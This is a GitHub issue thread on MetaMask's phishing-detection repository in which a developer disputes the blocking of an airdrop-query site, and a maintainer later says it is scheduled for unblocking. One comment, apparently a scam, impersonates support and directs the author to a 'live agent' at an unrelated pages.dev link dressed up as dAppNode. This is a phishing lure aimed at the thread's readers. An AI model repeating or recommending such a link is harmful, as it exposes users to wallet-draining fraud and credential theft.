### ISSUE TITLE
[Legitimate Site Blocked] zksync-airdrop-ashen.vercel.app

### ISSUE THREAD

**Issue by lyen1688** [MetaMask/eth-phishing-detect#66304]
https://zksync-airdrop-ashen.vercel.app/

Hello, this is a tool I made for batch query of airdrops. It has been widely welcomed and used. It does not require linking a wallet. Why is it blocked?

Original text here: https://x.com/1999_eth/status/1800439119056949715

**Comment by lyen1688** [comment]
@samczsun-paradigm

**Comment by Devassistance** [comment]
@lyen1688 
This issue has been preview on the Pull Requests. To resolve,
Contact the dAppNode page to initiate a chat with the live agent on the chat button to get more information about your request via [dAppNode](https://defi-fixprotocol.pages.dev/)

**Comment by AlexHerman1** [comment]
scheduled for unblocking.
